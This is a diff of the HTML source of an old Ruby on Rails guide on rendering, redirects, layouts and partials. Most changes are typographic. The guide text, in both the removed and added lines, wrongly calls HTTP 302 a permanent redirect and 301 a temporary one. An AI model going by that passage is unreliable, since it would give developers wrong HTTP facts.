    Tip You don't need to call to_json on the object that you want to render. If you use the :json option, render will automatically call to_json for you.You don’t need to call to_json on the object that you want to render. If you use the :json option, render will automatically call to_json for you.

    2.2.9. Rendering XML

    -

    Rails also has built-in support for converting objects to XML and rendering that XML back to the caller:

    +

    Rails also has built-in support for converting objects to XML and rendering that XML back to the caller:

    -
    render :xml => @product
    -
    +
    render :xml => @product
    - +
    Tip You don't need to call to_xml on the object that you want to render. If you use the :xml option, render will automatically call to_xml for you.You don’t need to call to_xml on the object that you want to render. If you use the :xml option, render will automatically call to_xml for you.

    2.2.10. Rendering Vanilla JavaScript

    -

    Rails can render vanilla JavaScript (as an alternative to using update with n .rjs file):

    +

    Rails can render vanilla JavaScript (as an alternative to using update with n .rjs file):

    -
    render :js => "alert('Hello Rails');"
    -
    -

    This will send the supplied string to the browser with a MIME type of text/javascript.

    +
    render :js => "alert('Hello Rails');"
    +

    This will send the supplied string to the browser with a MIME type of text/javascript.

    2.2.11. Options for render

    -

    Calls to the render method generally accept four options:

    -
      +

      Calls to the render method generally accept four options:

      +
      • :content_type @@ -524,56 +571,51 @@ http://www.gnu.org/software/src-highlite -->

      The :content_type Option
      -

      By default, Rails will serve the results of a rendering operation with the MIME content-type of text/html (or application/json if you use the :json option, or application/xml for the :xml option.). There are times when you might like to change this, and you can do so by setting the :content_type option:

      +

      By default, Rails will serve the results of a rendering operation with the MIME content-type of text/html (or application/json if you use the :json option, or application/xml for the :xml option.). There are times when you might like to change this, and you can do so by setting the :content_type option:

      -
      render :file => filename, :content_type => 'application/rss'
      -
      +
      render :file => filename, :content_type => 'application/rss'
    The :layout Option
    -

    With most of the options to render, the rendered content is displayed as part of the current layout. You'll learn more about layouts and how to use them later in this guide.

    -

    You can use the :layout option to tell Rails to use a specific file as the layout for the current action:

    +

    With most of the options to render, the rendered content is displayed as part of the current layout. You’ll learn more about layouts and how to use them later in this guide.

    +

    You can use the :layout option to tell Rails to use a specific file as the layout for the current action:

    -
    render :layout => 'special_layout'
    -
    -

    You can also tell Rails to render with no layout at all:

    +
    render :layout => 'special_layout'
    +

    You can also tell Rails to render with no layout at all:

    -
    render :layout => false
    -
    +
    render :layout => false
    The :status Option
    -

    Rails will automatically generate a response with the correct HTML status code (in most cases, this is 200 OK). You can use the :status option to change this:

    +

    Rails will automatically generate a response with the correct HTML status code (in most cases, this is 200 OK). You can use the :status option to change this:

    render :status => 500
    -render :status => :forbidden
    -
    -

    Rails understands either numeric status codes or symbols for status codes. You can find its list of status codes in actionpack/lib/action_controller/status_codes.rb. You can also see there how it maps symbols to status codes in that file.

    +render :status => :forbidden +

    Rails understands either numeric status codes or symbols for status codes. You can find its list of status codes in actionpack/lib/action_controller/status_codes.rb. You can also see there how it maps symbols to status codes in that file.

    The :location Option
    -

    You can use the :location option to set the HTTP Location header:

    +

    You can use the :location option to set the HTTP Location header:

    -
    render :xml => photo, :location => photo_url(photo)
    -
    +
    render :xml => photo, :location => photo_url(photo)

    2.2.12. Finding Layouts

    -

    To find the current layout, Rails first looks for a file in app/views/layouts with the same base name as the controller. For example, rendering actions from the PhotosController class will use /app/views/layouts/photos.html.erb. If there is no such controller-specific layout, Rails will use /app/views/layouts/application.html.erb. If there is no .erb layout, Rails will use a .builder layout if one exists. Rails also provides several ways to more precisely assign specific layouts to individual controllers and actions.

    +

    To find the current layout, Rails first looks for a file in app/views/layouts with the same base name as the controller. For example, rendering actions from the PhotosController class will use /app/views/layouts/photos.html.erb. If there is no such controller-specific layout, Rails will use /app/views/layouts/application.html.erb. If there is no .erb layout, Rails will use a .builder layout if one exists. Rails also provides several ways to more precisely assign specific layouts to individual controllers and actions.

    Specifying Layouts on a per-Controller Basis
    -

    You can override the automatic layout conventions in your controllers by using the layout declaration in the controller. For example:

    +

    You can override the automatic layout conventions in your controllers by using the layout declaration in the controller. For example:

    class ProductsController < ApplicationController
       layout "inventory"
       #...
    -end
    -
    -

    With this declaration, all methods within ProductsController will use app/views/layouts/inventory.html.erb for their layout.

    -

    To assign a specific layout for the entire application, use a declaration in your ApplicationController class:

    +end +

    With this declaration, all methods within ProductsController will use app/views/layouts/inventory.html.erb for their layout.

    +

    To assign a specific layout for the entire application, use a declaration in your ApplicationController class:

    class ApplicationController < ActionController::Base
       layout "main"
       #...
    -end
    -
    -

    With this declaration, all views in the entire application will use app/views/layouts/main.html.erb for their layout.

    +end +

    With this declaration, all views in the entire application will use app/views/layouts/main.html.erb for their layout.

    Choosing Layouts at Runtime
    -

    You can use a symbol to defer the choice of layout until a request is processed:

    +

    You can use a symbol to defer the choice of layout until a request is processed:

    @current_user.special? ? "special" : "products" end -end -
    -

    Now, if the current user is a special user, they'll get a special layout when viewing a product. You can even use an inline method to determine the layout:

    +end +

    Now, if the current user is a special user, they’ll get a special layout when viewing a product. You can even use an inline method to determine the layout:

    class ProductsController < ApplicationController
       layout proc{ |controller| controller.
       # ...
    -end
    -
    +end
    Conditional Layouts
    -

    Layouts specified at the controller level support :only and :except options that take either a method name or an array of method names:

    +

    Layouts specified at the controller level support :only and :except options that take either a method name or an array of method names:

    class ProductsController < ApplicationController
    @@ -639,10 +677,10 @@ http://www.gnu.org/software/src-highlite -->
       #...
     end
    -

    With those declarations, the inventory layout would be used only for the index method, the product layout would be used for everything else except the rss method, and the rss method will have its layout determined by the automatic layout rules.

    +

    With those declarations, the inventory layout would be used only for the index method, the product layout would be used for everything else except the rss method, and the rss method will have its layout determined by the automatic layout rules.

    Layout Inheritance
    -

    Layouts are shared downwards in the hierarchy, and more specific layouts always override more general ones. For example:

    -

    application_controller.rb:

    +

    Layouts are shared downwards in the hierarchy, and more specific layouts always override more general ones. For example:

    +

    application_controller.rb:

    class ApplicationController < ActionController::Base
       layout "main"
       #...
    -end
    -
    -

    posts_controller.rb:

    +end +

    posts_controller.rb:

    class PostsController < ApplicationController
       # ...
    -end
    -
    -

    special_posts_controller.rb:

    +end +

    special_posts_controller.rb:

    class SpecialPostsController < PostsController
       layout "special"
       # ...
    -end
    -
    -

    old_posts_controller.rb:

    +end +

    old_posts_controller.rb:

    render :layout => "old" end # ... -end -
    -

    In this application:

    -
      +end
    +

    In this application:

    +
    • In general, views will be rendered in the main layout @@ -723,8 +757,8 @@ In general, views will be rendered in the main layout

    2.2.13. Avoiding Double Render Errors

    -

    Sooner or later, most Rails developers will see the error message "Can only render or redirect once per action". While this is annoying, it's relatively easy to fix. Usually it happens because of a fundamental misunderstanding of the way that render works.

    -

    For example, here's some code that will trigger this error:

    +

    Sooner or later, most Rails developers will see the error message "Can only render or redirect once per action". While this is annoying, it’s relatively easy to fix. Usually it happens because of a fundamental misunderstanding of the way that render works.

    +

    For example, here’s some code that will trigger this error:

    if @book.special? render :action => "special_show" end -end -
    -

    If @book.special? evaluates to true, Rails will start the rendering process to dump the @book variable into the special_show view. But this will not stop the rest of the code in the show action from running, and when Rails hits the end of the action, it will start to render the show view - and throw an error. The solution is simple: make sure that you only have one call to render or redirect in a single code path. One thing that can help is and return. Here's a patched version of the method:

    +end +

    If @book.special? evaluates to true, Rails will start the rendering process to dump the @book variable into the special_show view. But this will not stop the rest of the code in the show action from running, and when Rails hits the end of the action, it will start to render the show view - and throw an error. The solution is simple: make sure that you only have one call to render or redirect in a single code path. One thing that can help is and return. Here’s a patched version of the method:

    if @book.special? render :action => "special_show" and return end -end -
    +end

    2.3. Using redirect_to

    -

    Another way to handle returning responses to a HTTP request is with redirect_to. As you've seen, render tells Rails which view (or other asset) to use in constructing a response. The redirect_to method does something completely different: it tells the browser to send a new request for a different URL. For example, you could redirect from wherever you are in your code to the index of photos in your application with this call:

    +

    Another way to handle returning responses to a HTTP request is with redirect_to. As you’ve seen, render tells Rails which view (or other asset) to use in constructing a response. The redirect_to method does something completely different: it tells the browser to send a new request for a different URL. For example, you could redirect from wherever you are in your code to the index of photos in your application with this call:

    -
    redirect_to photos_path
    -
    -

    You can use redirect_to with any arguments that you could use with link_to or url_for. In addition, there's a special redirect that sends the user back to the page they just came from:

    +
    redirect_to photos_path
    +

    You can use redirect_to with any arguments that you could use with link_to or url_for. In addition, there’s a special redirect that sends the user back to the page they just came from:

    redirect_to :back

    2.3.1. Getting a Different Redirect Status Code

    -

    Rails uses HTTP status code 302 (permanent redirect) when you call redirect_to. If you'd like to use a different status code (perhaps 301, temporary redirect), you can do so by using the :status option:

    +

    Rails uses HTTP status code 302 (permanent redirect) when you call redirect_to. If you’d like to use a different status code (perhaps 301, temporary redirect), you can do so by using the :status option:

    redirect_to photos_path, :status => 301
    -

    Just like the :status option for render, :status for redirect_to accepts both numeric and symbolic header designations.

    +

    Just like the :status option for render, :status for redirect_to accepts both numeric and symbolic header designations.

    2.3.2. The Difference Between render and redirect

    -

    Sometimes inexperienced developers conceive of redirect_to as a sort of goto command, moving execution from one place to another in your Rails code. This is not correct. Your code stops running and waits for a new request for the browser. It just happens that you've told the browser what request it should make next, by sending back a HTTP 302 status code.

    -

    Consider these actions to see the difference:

    +

    Sometimes inexperienced developers conceive of redirect_to as a sort of goto command, moving execution from one place to another in your Rails code. This is not correct. Your code stops running and waits for a new request for the browser. It just happens that you’ve told the browser what request it should make next, by sending back a HTTP 302 status code.

    +

    Consider these actions to see the difference:

    if @book.nil? render :action => "index" and return end -end -
    -

    With the code in this form, there will be likely be a problem if the @book variable is nil. Remember, a render :action doesn't run any code in the target action, so nothing will set up the @books variable that the index view is presumably depending on. One way to fix this is to redirect instead of rendering:

    +end +

    With the code in this form, there will be likely be a problem if the @book variable is nil. Remember, a render :action doesn’t run any code in the target action, so nothing will set up the @books variable that the index view is presumably depending on. One way to fix this is to redirect instead of rendering:

    if @book.nil? redirect_to :action => "index" and return end -end -
    -

    With this code, the browser will make a fresh request for the index page, the code in the index method will run, and all will be well.

    +end +

    With this code, the browser will make a fresh request for the index page, the code in the index method will run, and all will be well.

    2.4. Using head To Build Header-Only Responses

    -

    The head method exists to let you send back responses to the browser that have only headers. It provides a more obvious alternative to calling render :nothing. The head method takes one response, which is interpreted as a hash of header names and values. For example, you can return only an error header:

    +

    The head method exists to let you send back responses to the browser that have only headers. It provides a more obvious alternative to calling render :nothing. The head method takes one response, which is interpreted as a hash of header names and values. For example, you can return only an error header:

    -
    head :bad_request
    -
    -

    Or you can use other HTTP headers to convey additional information:

    +
    head :bad_request
    +

    Or you can use other HTTP headers to convey additional information:

    -
    head :created, :location => photo_path(@photo)
    -
    +
    head :created, :location => photo_path(@photo)

    3. Structuring Layouts

    -

    When Rails renders a view as a response, it does so by combining the view with the current layout (using the rules for finding the current layout that were covered earlier in this guide). Within a layout, you have access to three tools for combining different bits of output to form the overall response:

    -
      +

      When Rails renders a view as a response, it does so by combining the view with the current layout (using the rules for finding the current layout that were covered earlier in this guide). Within a layout, you have access to three tools for combining different bits of output to form the overall response:

      +
      • Asset tags @@ -846,10 +873,10 @@ Partials

      -

      I'll discuss each of these in turn.

      +

      I’ll discuss each of these in turn.

      3.1. Asset Tags

      -

      Asset tags provide methods for generating HTML that links views to assets like images, javascript, stylesheets, and feeds. There are four types of include tag:

      -
        +

        Asset tags provide methods for generating HTML that links views to assets like images, javascript, stylesheets, and feeds. There are four types of include tag:

        +
        • auto_discovery_link_tag @@ -871,26 +898,25 @@ image_tag

        -

        You can use these tags in layouts or other views, although the tags other than image_tag are most commonly used in the <head> section of a layout.

        +

        You can use these tags in layouts or other views, although the tags other than image_tag are most commonly used in the <head> section of a layout.

        - +
        Warning The asset tags do not verify the existence of the assets at the specified locations; they simply assume that you know what you're doing and generate the link.The asset tags do not verify the existence of the assets at the specified locations; they simply assume that you know what you’re doing and generate the link.
        -

        The auto_discovery_link_tag helper builds HTML that most browsers and newsreaders can use to detect the presences of RSS or ATOM feeds. It takes the type of the link (:rss+ or :atom), a hash of options that are passed through to url_for, and a hash of options for the tag:

        +

        The auto_discovery_link_tag helper builds HTML that most browsers and newsreaders can use to detect the presences of RSS or ATOM feeds. It takes the type of the link (:rss+ or :atom), a hash of options that are passed through to url_for, and a hash of options for the tag:

        -
        <%= auto_discovery_link_tag(:rss, {:action => "feed"}, {:title => "RSS Feed"}) %>
        -
        -

        There are three tag options available for auto_discovery_link_tag:

        -
          +
          <%= auto_discovery_link_tag(:rss, {:action => "feed"}, {:title => "RSS Feed"}) %>
      +

      There are three tag options available for auto_discovery_link_tag:

      +
      • :rel specifies the rel value in the link (defaults to "alternate") @@ -908,180 +934,159 @@ http://www.gnu.org/software/src-highlite -->

      3.1.2. Linking to Javascript Files with javascript_include_tag

      -

      The javascript_include_tag helper returns an HTML <script> tag for each source provided. Rails looks in public/javascripts for these files by default, but you can specify a full path relative to the document root, or a URL, if you prefer. For example, to include public/javascripts/main.js:

      +

      The javascript_include_tag helper returns an HTML <script> tag for each source provided. Rails looks in public/javascripts for these files by default, but you can specify a full path relative to the document root, or a URL, if you prefer. For example, to include public/javascripts/main.js:

      -
      <%= javascript_include_tag "main" %>
      -
      -

      To include public/javascripts/main.js and public/javascripts/columns.js:

      +
      <%= javascript_include_tag "main" %>
    +

    To include public/javascripts/main.js and public/javascripts/columns.js:

    -
    <%= javascript_include_tag "main", "columns" %>
    -
    -

    To include public/javascripts/main.js and public/photos/columns.js:

    +
    <%= javascript_include_tag "main", "columns" %>
    +

    To include public/javascripts/main.js and public/photos/columns.js:

    -
    <%= javascript_include_tag "main", "/photos/columns" %>
    -
    -

    To include http://example.com/main.js:

    +
    <%= javascript_include_tag "main", "/photos/columns" %>
    +

    To include http://example.com/main.js:

    -
    <%= javascript_include_tag "http://example.com/main.js" %>
    -
    -

    The defaults option loads the Prototype and Scriptaculous libraries:

    +
    <%= javascript_include_tag "http://example.com/main.js" %>
    +

    The defaults option loads the Prototype and Scriptaculous libraries:

    -
    <%= javascript_include_tag :defaults %>
    -
    -

    The all option loads every javascript file in public/javascripts, starting with the Prototype and Scriptaculous libraries:

    +
    <%= javascript_include_tag :defaults %>
    +

    The all option loads every javascript file in public/javascripts, starting with the Prototype and Scriptaculous libraries:

    -
    <%= javascript_include_tag :all %>
    -
    -

    You can supply the :recursive option to load files in subfolders of public/javascripts as well:

    +
    <%= javascript_include_tag :all %>
    +

    You can supply the :recursive option to load files in subfolders of public/javascripts as well:

    -
    <%= javascript_include_tag :all, :recursive => true %>
    -
    -

    If you're loading multiple javascript files, you can create a better user experience by combining multiple files into a single download. To make this happen in production, specify :cache ⇒ true in your javascript_include_tag:

    +
    <%= javascript_include_tag :all, :recursive => true %>
    +

    If you’re loading multiple javascript files, you can create a better user experience by combining multiple files into a single download. To make this happen in production, specify :cache => true in your javascript_include_tag:

    -
    <%= javascript_include_tag "main", "columns", :cache => true %>
    -
    -

    By default, the combined file will be delivered as javascripts/all.js. You can specify a location for the cached asset file instead:

    +
    <%= javascript_include_tag "main", "columns", :cache => true %>
    +

    By default, the combined file will be delivered as javascripts/all.js. You can specify a location for the cached asset file instead:

    -
    <%= javascript_include_tag "main", "columns", :cache => 'cache/main/display' %>
    -
    -

    +
    <%= javascript_include_tag "main", "columns", :cache => 'cache/main/display' %>
    +

    -

    The stylesheet_link_tag helper returns an HTML <link> tag for each source provided. Rails looks in public/stylesheets for these files by default, but you can specify a full path relative to the document root, or a URL, if you prefer. For example, to include public/stylesheets/main.cs:

    +

    The stylesheet_link_tag helper returns an HTML <link> tag for each source provided. Rails looks in public/stylesheets for these files by default, but you can specify a full path relative to the document root, or a URL, if you prefer. For example, to include public/stylesheets/main.cs:

    -
    <%= stylesheet_link_tag "main" %>
    -
    -

    To include public/stylesheets/main.css and public/stylesheets/columns.css:

    +
    <%= stylesheet_link_tag "main" %>
    +

    To include public/stylesheets/main.css and public/stylesheets/columns.css:

    -
    <%= stylesheet_link_tag "main", "columns" %>
    -
    -

    To include public/stylesheets/main.css and public/photos/columns.css:

    +
    <%= stylesheet_link_tag "main", "columns" %>
    +

    To include public/stylesheets/main.css and public/photos/columns.css:

    -
    <%= stylesheet_link_tag "main", "/photos/columns" %>
    -
    -

    To include http://example.com/main.cs:

    +
    <%= stylesheet_link_tag "main", "/photos/columns" %>
    +

    To include http://example.com/main.cs:

    -
    <%= stylesheet_link_tag "http://example.com/main.cs" %>
    -
    -

    By default, stylesheet_link_tag creates links with media="screen" rel="stylesheet" type="text/css". You can override any of these defaults by specifying an appropriate option (:media, :rel, or :type):

    +
    <%= stylesheet_link_tag "http://example.com/main.cs" %>
    +

    By default, stylesheet_link_tag creates links with media="screen" rel="stylesheet" type="text/css". You can override any of these defaults by specifying an appropriate option (:media, :rel, or :type):

    -
    <%= stylesheet_link_tag "main_print", media => "print" %>
    -
    -

    The all option links every CSS file in public/stylesheets:

    +
    <%= stylesheet_link_tag "main_print", media => "print" %>
    +

    The all option links every CSS file in public/stylesheets:

    -
    <%= stylesheet_link_tag :all %>
    -
    -

    You can supply the :recursive option to link files in subfolders of public/stylesheets as well:

    +
    <%= stylesheet_link_tag :all %>
    +

    You can supply the :recursive option to link files in subfolders of public/stylesheets as well:

    -
    <%= stylesheet_link_tag :all, :recursive => true %>
    -
    -

    If you're loading multiple CSS files, you can create a better user experience by combining multiple files into a single download. To make this happen in production, specify :cache ⇒ true in your stylesheet_link_tag:

    +
    <%= stylesheet_link_tag :all, :recursive => true %>
    +

    If you’re loading multiple CSS files, you can create a better user experience by combining multiple files into a single download. To make this happen in production, specify :cache => true in your stylesheet_link_tag:

    -
    <%= stylesheet_link_tag "main", "columns", :cache => true %>
    -
    -

    By default, the combined file will be delivered as stylesheets/all.css. You can specify a location for the cached asset file instead:

    +
    <%= stylesheet_link_tag "main", "columns", :cache => true %>
    +

    By default, the combined file will be delivered as stylesheets/all.css. You can specify a location for the cached asset file instead:

    -
    <%= stylesheet_link_tag "main", "columns", :cache => 'cache/main/display' %>
    -
    -

    +
    <%= stylesheet_link_tag "main", "columns", :cache => 'cache/main/display' %>
    +

    3.1.4. Linking to Images with image_tag

    -

    The image_tag helper builds an HTML <image> tag to the specified file. By default, files are loaded from public/images. If you don't specify an extension, .png is assumed by default:

    +

    The image_tag helper builds an HTML <image> tag to the specified file. By default, files are loaded from public/images. If you don’t specify an extension, .png is assumed by default:

    -
    <%= image_tag "header" %>
    -
    -

    You can supply a path to the image if you like:

    +
    <%= image_tag "header" %>
    +

    You can supply a path to the image if you like:

    -
    <%= image_tag "icons/delete.gif" %>
    -
    -

    You can supply a hash of additional HTML options:

    +
    <%= image_tag "icons/delete.gif" %>
    +

    You can supply a hash of additional HTML options:

    -
    <%= image_tag "icons/delete.gif", :height => 45 %>
    -
    -

    There are also three special options you can use with image_tag:

    -
      +
      <%= image_tag "icons/delete.gif", :height => 45 %>
    +

    There are also three special options you can use with image_tag:

    +
    • :alt specifies the alt text for the image (which defaults to the file name of the file, capitalized and with no extension) @@ -1098,7 +1103,7 @@ http://www.gnu.org/software/src-highlite -->

    3.2. Understanding yield

    -

    Within the context of a layout, yield identifies a section where content from the view should be inserted. The simplest way to use this is to have a single yield, into which the entire contents of the view currently being rendered is inserted:

    +

    Within the context of a layout, yield identifies a section where content from the view should be inserted. The simplest way to use this is to have a single yield, into which the entire contents of the view currently being rendered is inserted:

    <body> <%= yield %> <hbody> -</html> -
    -

    You can also create a layout with multiple yielding regions:

    +</html> +

    You can also create a layout with multiple yielding regions:

    <body> <%= yield %> <hbody> -</html> -
    -

    The main body of the view will always render into the unnamed yield. To render content into a named yield, you use the content_for method.

    +</html> +

    The main body of the view will always render into the unnamed yield. To render content into a named yield, you use the content_for method.

    3.3. Using content_for

    -

    The content_for method allows you to insert content into a yield block in your layout. You only use content_for to insert content in named yields. For example, this view would work with the layout that you just saw:

    +

    The content_for method allows you to insert content into a yield block in your layout. You only use content_for to insert content in named yields. For example, this view would work with the layout that you just saw:

    <title>A simple page</title> <% end %> -<p>Hello, Rails!</p> -
    -

    The result of rendering this page into the supplied layout would be this HTML:

    +<p>Hello, Rails!</p> +

    The result of rendering this page into the supplied layout would be this HTML:

    <body> <p>Hello, Rails!</p> <hbody> -</html> -
    -

    The content_for method is very helpful when your layout contains distinct regions such as sidebars and footers that should get their own blocks of content inserted. It's also useful for inserting tags that load page-specific javascript or css files into the header of an otherwise-generic layout.

    +</html> +

    The content_for method is very helpful when your layout contains distinct regions such as sidebars and footers that should get their own blocks of content inserted. It’s also useful for inserting tags that load page-specific javascript or css files into the header of an otherwise-generic layout.

    3.4. Using Partials

    -

    Partial templates - usually just called "partials" - are another device for breaking apart the rendering process into more manageable chunks. With a partial, you can move the code for rendering a particular piece of a response to its own file.

    +

    Partial templates - usually just called "partials" - are another device for breaking apart the rendering process into more manageable chunks. With a partial, you can move the code for rendering a particular piece of a response to its own file.

    3.4.1. Naming Partials

    -

    To render a partial as part of a view, you use the render method within the view, and include the :partial option:

    +

    To render a partial as part of a view, you use the render method within the view, and include the :partial option:

    -
    <%= render :partial => "menu" %>
    -
    -

    This will render a file named _menu.html.erb at that point within the view being rendered. Note the leading underscore character: partials are named with a leading underscore to distinguish them from regular views, even though they are referred to without the underscore. This holds true even when you're pulling in a partial from another folder:

    +
    <%= render :partial => "menu" %>
    +

    This will render a file named _menu.html.erb at that point within the view being rendered. Note the leading underscore character: partials are named with a leading underscore to distinguish them from regular views, even though they are referred to without the underscore. This holds true even when you’re pulling in a partial from another folder:

    -
    <%= render :partial => "shared/menu" %>
    -
    -

    That code will pull in the partial from app/views/shared/_menu.html.erb.

    +
    <%= render :partial => "shared/menu" %>
    +

    That code will pull in the partial from app/views/shared/_menu.html.erb.

    3.4.2. Using Partials to Simplify Views

    -

    One way to use partials is to treat them as the equivalent of subroutines: as a way to move details out of a view so that you can grasp what's going on more easily. For example, you might have a view that looked like this:

    +

    One way to use partials is to treat them as the equivalent of subroutines: as a way to move details out of a view so that you can grasp what’s going on more easily. For example, you might have a view that looked like this:

    <p>Here are a few of our fine products:</p> ... -<%= render :partial => "shared/footer" %> -
    -

    Here, the _ad_banner.html.erb and _footer.html.erb partials could contain content that is shared among many pages in your application. You don't need to see the details of these sections when you're concentrating on a particular page.

    +<%= render :partial => "shared/footer" %> +

    Here, the _ad_banner.html.erb and _footer.html.erb partials could contain content that is shared among many pages in your application. You don’t need to see the details of these sections when you’re concentrating on a particular page.

    @@ -1203,18 +1201,17 @@ http://www.gnu.org/software/src-highlite -->

    3.4.3. Partial Layouts

    -

    A partial can use its own layout file, just as a view can use a layout. For example, you might call a partial like this:

    +

    A partial can use its own layout file, just as a view can use a layout. For example, you might call a partial like this:

    -
    <%= render :partial => "link_area", :layout => "graybar" %>
    -
    -

    This would look for a partial named _link_area.html.erb and render it using the layout _graybar.html.erb. Note that layouts for partials follow the same leading-underscore naming as regular partials, and are placed in the same folder with the partial that they belong to (not in the master layouts folder).

    +
    <%= render :partial => "link_area", :layout => "graybar" %>
    +

    This would look for a partial named _link_area.html.erb and render it using the layout _graybar.html.erb. Note that layouts for partials follow the same leading-underscore naming as regular partials, and are placed in the same folder with the partial that they belong to (not in the master layouts folder).

    3.4.4. Passing Local Variables

    -

    You can also pass local variables into partials, making them even more powerful and flexible. For example, you can use this technique to reduce duplication between new and edit pages, while still keeping a bit of distinct content:

    -

    new.html.erb:

    +

    You can also pass local variables into partials, making them even more powerful and flexible. For example, you can use this technique to reduce duplication between new and edit pages, while still keeping a bit of distinct content:

    +

    new.html.erb:

    <h1>New zone</h1>
     <%= error_messages_for :zone %>
    -<%= render :partial => "form", :locals => { :button_label => "Create zone", :zone => @zone } %>
    -
    -

    edit.html.erb:

    +<%= render :partial => "form", :locals => { :button_label => "Create zone", :zone => @zone } %> +

    edit.html.erb:

    <h1>Editing zone</h1>
     <%= error_messages_for :zone %>
    -<%= render :partial => "form", :locals => { :button_label => "Update zone", :zone => @zone } %>
    -
    -

    _form.html.erb:

    +<%= render :partial => "form", :locals => { :button_label => "Update zone", :zone => @zone } %> +

    _form.html.erb:

    <p> <%= f.submit button_label %> </p> -<% end %> -
    -

    Although the same partial will be rendered into both views, the label on the submit button is controlled by a local variable passed into the partial.

    -

    Every partial also has a local variable with the same name as the partial (minus the underscore). You can pass an object in to this local variable via the :object option:

    +<% end %> +

    Although the same partial will be rendered into both views, the label on the submit button is controlled by a local variable passed into the partial.

    +

    Every partial also has a local variable with the same name as the partial (minus the underscore). You can pass an object in to this local variable via the :object option:

    -
    <%= render :partial => "customer", :object => @new_customer %>
    -
    -

    Within the customer partial, the @customer variable will refer to @new_customer from the parent view.

    +
    <%= render :partial => "customer", :object => @new_customer %>
    +

    Within the customer partial, the @customer variable will refer to @new_customer from the parent view.

    @@ -1268,110 +1261,157 @@ http://www.gnu.org/software/src-highlite --> In previous versions of Rails, the default local variable would look for an instance variable with the same name as the partial in the parent. This behavior is deprecated in Rails 2.2 and will be removed in a future version.
    -

    If you have an instance of a model to render into a partial, you can use a shorthand syntax:

    +

    If you have an instance of a model to render into a partial, you can use a shorthand syntax:

    -
    <%= render :partial => @customer %>
    -
    -

    Assuming that the @customer instance variable contains an instance of the Customer model, this will use _customer.html.erb to render it.

    +
    <%= render :partial => @customer %>
    +

    Assuming that the @customer instance variable contains an instance of the Customer model, this will use _customer.html.erb to render it.

    3.4.5. Rendering Collections

    -

    Partials are very useful in rendering collections. When you pass a collection to a partial via the :collection option, the partial will be inserted once for each member in the collection:

    -

    index.html.erb:

    +

    Partials are very useful in rendering collections. When you pass a collection to a partial via the :collection option, the partial will be inserted once for each member in the collection:

    +

    index.html.erb:

    <h1>Products</h1>
    -<%= render :partial => "product", :collection => @products %>
    -
    -

    _product.html.erb:

    +<%= render :partial => "product", :collection => @products %> +

    _product.html.erb:

    -
    <p>Product Name: <%= product.name %></p>
    -
    -

    When a partial is called with a pluralized collection, then the individual instances of the partial have access to the member of the collection being rendered via a variable named after the partial. In this case, the partial is _product, and within the +_product partial, you can refer to product to get the instance that is being rendered. To use a custom local variable name within the partial, specify the :as option in the call to the partial:

    +
    <p>Product Name: <%= product.name %></p>
    +

    When a partial is called with a pluralized collection, then the individual instances of the partial have access to the member of the collection being rendered via a variable named after the partial. In this case, the partial is _product, and within the +_product partial, you can refer to product to get the instance that is being rendered. To use a custom local variable name within the partial, specify the :as option in the call to the partial:

    -
    <%= render :partial => "product", :collection => @products, :as => :item %>
    -
    -

    With this change, you can access an instance of the @products collection as the item local variable within the partial.

    +
    <%= render :partial => "product", :collection => @products, :as => :item %>
    +

    With this change, you can access an instance of the @products collection as the item local variable within the partial.

    - +
    Tip Rails also makes a counter variable available within a partial called by the collection, named after the member of the collection followed by _counter. For example, if you're rendering @products, within the partial you can refer to product_counter to tell you how many times the partial has been rendered.Rails also makes a counter variable available within a partial called by the collection, named after the member of the collection followed by _counter. For example, if you’re rendering @products, within the partial you can refer to product_counter to tell you how many times the partial has been rendered.
    -

    You can also specify a second partial to be rendered between instances of the main partial by using the :spacer_template option:

    +

    You can also specify a second partial to be rendered between instances of the main partial by using the :spacer_template option:

    -
    <%= render :partial => "product", :collection => @products, :spacer_template => "product_ruler" %>
    -
    -

    Rails will render the _product_ruler partial (with no data passed in to it) between each pair of _product partials.

    -

    There's also a shorthand syntax available for rendering collections. For example, if @products is a collection of products, you can render the collection this way:

    -

    index.html.erb:

    +
    <%= render :partial => "product", :collection => @products, :spacer_template => "product_ruler" %>
    +

    Rails will render the _product_ruler partial (with no data passed in to it) between each pair of _product partials.

    +

    There’s also a shorthand syntax available for rendering collections. For example, if @products is a collection of products, you can render the collection this way:

    +

    index.html.erb:

    <h1>Products</h1>
    -<%= render :partial => @products %>
    -
    -

    _product.html.erb:

    +<%= render :partial => @products %> +

    _product.html.erb:

    -
    <p>Product Name: <%= product.name %></p>
    -
    -

    Rails determines the name of the partial to use by looking at the model name in the collection. In fact, you can even create a heterogeneous collection and render it this way, and Rails will choose the proper partial for each member of the collection:

    -

    index.html.erb:

    +
    <p>Product Name: <%= product.name %></p>
    +

    Rails determines the name of the partial to use by looking at the model name in the collection. In fact, you can even create a heterogeneous collection and render it this way, and Rails will choose the proper partial for each member of the collection:

    +

    index.html.erb:

    <h1>Contacts</h1>
    -<%= render :partial => [customer1, employee1, customer2, employee2] %>
    -
    -

    _customer.html.erb:

    +<%= render :partial => [customer1, employee1, customer2, employee2] %> +

    _customer.html.erb:

    -
    <p>Name: <%= customer.name %></p>
    -
    -

    _employee.html.erb:

    +
    <p>Name: <%= customer.name %></p>
    +

    _employee.html.erb:

    -
    <p>Name: <%= employee.name %></p>
    -
    -

    In this case, Rails will use the customer or employee partials as appropriate for each member of the collection.

    +
    <p>Name: <%= employee.name %></p>
    +

    In this case, Rails will use the customer or employee partials as appropriate for each member of the collection.

    +

    3.5. Using Nested Layouts

    +

    You may find that your application requires a layout that differs slightly from your regular application layout to support one particular controller. Rather than repeating the main layout and editing it, you can accomplish this by using nested layouts (sometimes called sub-templates). Here’s an example:

    +

    Suppose you have the follow ApplicationController layout:

    +

    app/views/layouts/application.erb

    +
    +
    +
    <html>
    +<head>
    +  <title><%= @page_title %><title>
    +  <% stylesheet_tag 'layout' %>
    +  <style type="text/css"><%= yield :stylesheets %></style>
    +<head>
    +<body>
    +  <div id="top_menu">Top menu items here</div>
    +  <div id="menu">Menu items here</div>
    +  <div id="main"><%= yield %></div>
    +</body>
    +</html>
    +

    On pages generated by NewsController, you want to hide the top menu and add a right menu:

    +

    app/views/layouts/news.erb

    +
    +
    +
    <% content_for :stylesheets do %>
    +  #top_menu {display: none}
    +  #right_menu {float: right; background-color: yellow; color: black}
    +<% end -%>
    +<% content_for :main %>
    +  <div id="right_menu">Right menu items here</div>
    +  <%= yield %>
    +  <% end -%>
    +<% render :file => 'layouts/application' %>
    +
    + + + +
    +Note +In versions of Rails before Rails 2.3, you should use render 'layouts/applications' instead of render :file => 'layouts/applications\'
    +
    +

